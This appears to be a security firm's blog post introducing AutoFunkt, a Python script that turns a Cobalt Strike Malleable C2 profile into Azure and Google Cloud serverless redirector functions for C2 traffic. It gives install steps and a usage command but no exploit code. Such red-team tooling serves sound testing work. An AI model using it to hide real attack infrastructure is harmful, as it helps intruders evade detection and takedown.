Introducing AutoFunkt: Automated Cloud Redirector Generation
By Adam Rose
During recent research into C2 traffic redirection techniques, we found the process of manually editing serverless cloud function code and configuration files tedious and repetitive. So, we automated the process. The result is AutoFunkt, a Python script that reads a Cobalt Strike Malleable C2 profile and generates the function code for Azure and Google Cloud Provider serverless function redirectors.
How does it work?
AutoFunkt is a Python script that takes a specified Malleable C2 profile, parses it, and then spits out all the code necessary to deploy serverless redirector functions. When both the Google Cloud Provider (
-a --azure) switches are provided, it creates a directory structure that looks like this:
It also spits out the
gcloud commands to deploy generated GCP functions:
Deploying serverless functions to Azure is more complicated, so we recommend using VS Code's Azure Functions extension to deploy these. We outline this process in our previous post on this subject.
This script relies heavily on the
mpp pyMalleableProfileParser library by Brett Fitzpatrick. Many thanks!
Clone the repository from our Github.
cd into it and then run
pip3 install requirements.txt.
Usage looks like this:
python3 autofunkt.py -p <path-to-malleable-profile> -t <teamserver url> -a -s <azure project subdomain> -r <azure custom-route-prefix> -o <output directory name> -g
This command generates two sets of
POST HTTP redirector functions for both Azure and Google Cloud. It creates two subdirectories (
gcp) inside of a directory named the value of the
-o switch. Inside each subdirectory you'll find the code for the respective cloud functions.
If you just want to generate Google Cloud functions, use
-g/--google. Same goes for Azure with
There are some limitations to the tool:
- The Malleable Profile cannot contain more than one HTTP variant.
- There can only be one URI for each HTTP method, they can and should be different
- Google Cloud uses the function's name in the URL. Therefore, the value of
set urifor these blocks should adhere to python function naming requirements. no hyphens.
Feel free to take out an issue on the GitHub repo.